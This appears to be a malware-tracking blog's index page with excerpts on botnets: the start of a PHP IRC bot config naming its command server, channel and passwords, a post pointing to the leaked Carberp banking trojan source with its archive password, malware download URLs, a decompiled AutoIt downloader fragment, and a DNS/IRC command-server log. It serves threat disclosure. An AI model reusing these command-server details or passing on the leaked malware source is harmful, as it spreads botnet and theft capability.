Author: Pig

37.221.170.195(PHP Bots hosted in Germany Frankfurt Am MainVoxility S.r.l.)

Uncategorized

Found by Yewnix <? set_time_limit(0); error_reporting(0); class Anxiety { var $config = array("server"=>"37.221.170.195", // Server IP Address "port"=>443, "pass"=>"", // Server Password "prefix"=>"[r00t]-", "maxrand"=>3, "chan"=>"#exploit", // Channel "key"=>"lolmoney", // Channel Key "modes"=>"+p", "password"=>"lolmoney", // Bot Password "trigger"=>".", "hostauth"=>"anxiety.gov" // * For Any Hostname //Leave all of this shit down here alone, unless you know whatRead more...

Carberp The Banking Trojan Source Now Available To Public

Uncategorized

First Zeus now Carberp source are leaked to public Picture from dk forum Source and passwd for the rar archive are available via twitter thnx to ivanlef0u Another link for the source here(around 1.88GB) Password for the archive: “Kj1#w2*LadiOQpw3oi029)K Oa(28)uspeh”

srv1.su(snk’s botnet hosted in Luxembourg Steinsel Root Sa)

Uncategorized

The bot is downloaded by this autoit sample: hxxp://sglegacy.com/AA/dava.exe wich looks like http autoit downloader login here: hxxp://www.sglegacy.com/AA/index.php/login another sample downloaded from the dava.ese is this: hxxp://la-majeur.com/images/beta.exe( Betabot) here dava.exe decompiled: $at2 = "0" $at5 = 0 $at1 = "0" $at3 = "0" $avm = "0" $asb = "0" $at4 = "0" #NoTrayIcon #Region #AutoIt3Wrapper_UseUpx=nRead more...

kalurjaq.ru(Kelihos hosted in Kazakhstan Almaty Jsc Almatv)

Uncategorized

Kelihos (also know as Hlux) is a Spambot with the capability to steal credentials from the victims computer and drop additional malware. While the old version used the second level domain cz.cc for it’s distribution and to control the botnet, the new version takes advantage of TLD .eu in combination with Fast Flux techniques. HTTPRead more...

z.joerv02.com(irc botnet hosted in China Nanjing Chinanet Jiangsu Province Network)

Uncategorized

Name                     Query Type               Query Result        Successful        Protocol api.wipmania.com      DNS_TYPE_A      69.197.137.58      YES                   udp z.baerr02.com          DNS_TYPE_A                                     NO                    udp z.joerv02.com          DNS_TYPE_A       58.221.60.87         YES                    udp Server: z.joerv02.com:6513 PASS smart Channels: #dpi,#suk.#sar PASS smartRead more...